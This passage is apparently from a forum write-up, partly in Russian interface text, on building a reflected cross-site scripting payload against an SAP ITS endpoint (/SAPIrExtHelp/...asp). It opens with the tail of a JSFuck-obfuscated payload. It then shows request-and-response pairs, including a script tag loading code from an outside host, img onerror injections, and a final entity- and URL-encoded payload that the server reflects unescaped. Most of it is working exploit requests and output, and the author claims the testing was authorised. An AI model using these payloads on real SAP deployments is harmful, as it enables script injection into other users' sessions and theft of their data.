]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])>">
</head>
<body>
</body>
</html>Image [2]
Image [3]
So now my request is:
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><script%20src=http://xacker.mamkin/1.JS>.asp HTTP/2The response is:
Код: Скопировать в буфер обмена
Код:
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="refresh" content="0; URL=/SAPIKS2/logonFromUrl.sap?null&_CLASS=RANDOM/SAPIREXTHELP/RANDOM/"><SCRIPT SRC=HTTP:/XACKER.MAMKIN/1.JS>">
</head>
<body>
</body>
</html>Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><img/src=x/onerror=print(1)>.asp HTTP/2The response i got is
Код: Скопировать в буфер обмена
HTTP/2 404 Not FoundSo why did I get a 404? semicolon ( ; ) isn't a special character, I tried to urlencode it and send a request in that way but response still was 404. I think that the server/web application can be configured to handle semicolons in a specific way, and this configuration may result in a 404 error for semicolon-containing URLs, regardless of encoding. Now to understand what is happening here, I will start from scratch
200 OK
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/">.asp HTTP/2404 Not Found
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/">.asp HTTP/2200 OK / But the response is not decoded, it is ">
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/">.asp HTTP/2Maybe I should use numeric entities?
404 Not Found
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/">.asp HTTP/2What if I remove the ;
200 OK, Okay this one seems to be working.
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/">.asp HTTP/2Now I will go back and encode what I have to in correct way
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><img/src=x/onerror=print(1)>.asp HTTP/If I have 200 OK, maybe the issue is with img tag:
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><img%20src=x%20onerror=print(1)>.asp HTTP/2It worked, that's great! But the issue here is that HTML Encoded part should be also URL Encoded, otherwise & will be considered as special character. So the final request will be:
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><img%20src=x%20onerror=%26%23112%26%23114%26%23105%26%23110%26%23116(1)>.asp HTTP/2Response:
Код: Скопировать в буфер обмена
Код:
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="refresh" content="0; URL=/SAPIKS2/logonFromUrl.sap?null&_CLASS=RANDOM/SAPIREXTHELP/RANDOM/"><IMG SRC=X ONERROR=print(1)>">
</head>
<body>
</body>
</html>Image [4]
My payload was to print xD
As result now we have a better payload than what it was in nuclei, because our one encodes what is needed, not everything.
P.S. Tested with permission obviously.